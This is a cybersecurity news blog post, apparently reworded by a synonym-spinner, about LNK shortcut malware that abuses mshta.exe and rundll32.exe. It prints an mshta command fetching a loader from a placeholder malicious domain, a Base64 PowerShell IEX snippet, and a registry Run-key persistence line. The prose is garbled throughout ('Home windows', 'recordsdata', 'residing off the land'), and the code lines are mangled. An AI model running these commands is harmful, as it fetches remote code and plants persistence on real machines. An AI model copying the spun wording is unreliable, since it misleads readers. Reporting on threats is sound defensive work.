Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New LNK Malware Uses Windows Binaries to Bypass Security Tools and Execute Malware

Posted on September 25, 2025September 25, 2025 By CWS

A latest wave of assaults leveraging malicious Home windows shortcut recordsdata (.LNK) has put safety groups on excessive alert.

Rising in late August 2025, this new LNK malware distribution exploits trusted Microsoft binaries to bypass endpoint protections and execute payloads with out elevating suspicions.

Delivered primarily through spear-phishing emails and compromised web sites, the shortcut recordsdata seem innocuous, embedding instructions that invoke respectable Home windows utilities to fetch and launch further malware elements.

Early victims have reported delicate indicators of compromise, equivalent to anomalous PowerShell calls and sudden community connections, typically dismissed as benign system exercise.

Researchers noticed that the marketing campaign targets each enterprise and client endpoints, specializing in customers with elevated privileges.

The preliminary lure emails mimic inside IT notifications or safety alerts, encouraging recipients to click on on a seemingly innocent shortcut attachment.

Upon execution, the LNK file triggers Home windows Explorer to load a hidden payload, successfully weaponizing built-in binaries like mshta.exe and rundll32.exe to stage the assault.

This method permits the risk actor to evade antivirus signatures and behavioral detection guidelines that usually flag direct execution of unknown executables.

K7 Safety Labs analysts famous that the attackers rigorously crafted the LNK payload to leverage encoded parameters handed to those native utilities, stopping easy evaluation by sandbox environments.

By chaining a number of benign processes, the malware achieves “residing off the land” execution, decreasing its forensic footprint on disk and in reminiscence.

Victims’ endpoint logs present speedy course of spawning occasions, the place every course of palms off execution to the subsequent stage in underneath a second, complicating detection efforts.

An infection Mechanism and Payload Deployment

Diving deeper into the an infection mechanism, the malicious .LNK file embeds an OLE object that factors to a distant HTML utility (HTA) script hosted on a compromised server.

When a person double-clicks the shortcut, Explorer invokes mshta.exe with the next command line:-

mshta.exe “http[:]//malicious-domain.com/loader.hta”

An infection chain stream (Supply – K7 Safety Labs)

Right here the obfuscated loader script makes use of Base64-encoded PowerShell instructions to obtain the next-stage payload:-

$payload = ‘aGVsbG8gd29ybGQ=’
IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)))

This snippet decodes and executes a easy script from reminiscence, demonstrating how the attacker minimizes disk writes.

As soon as the HTA executes, it leverages rundll32.exe to load a malicious DLL immediately right into a suspended svchost.exe course of, bypassing executable file scanning.

The DLL is answerable for establishing persistence by making a Win32 registry run key:-

HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Identify “Updater” -Worth “rundll32.exe C:WindowsTempupdater.dll,EntryPoint”

By abusing registry-based persistence and trusted Home windows binaries, the malware ensures that it launches routinely upon person login, even when endpoint detections try and quarantine the DLL file.

Indicators of compromise embody community requests to suspicious domains, anomalous mshta.exe and rundll32.exe course of bushes, and unrecognized registry entries underneath the CurrentVersionRun key.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Binaries, Bypass, Execute, LNK, Malware, Security, Tools, Windows

Post navigation

Previous Post: Salesforce AI Hack Enabled CRM Data Theft
Next Post: Hackers Leverage GitHub Notifications to Mimic as Y Combinator to Steal Funds from Wallets

Related Posts

Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code Cyber Security News
HPE Insight Remote Support Vulnerability Let Attackers Execute Remote Code Cyber Security News
0-Click Zendesk Account Takeover Vulnerability Enables Access to all Zendesk Tickets Cyber Security News
Global Authorities Share IoCs and TTPs of Scattered Spider Behind Major ESXi Ransomware Attacks Cyber Security News
New Malware Attack Leverages YouTube Channels and Discord to Harvest Credentials from Computer Cyber Security News
CISA Releases 3 ICS Advisories Covering Vulnerabilities and Exploits Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News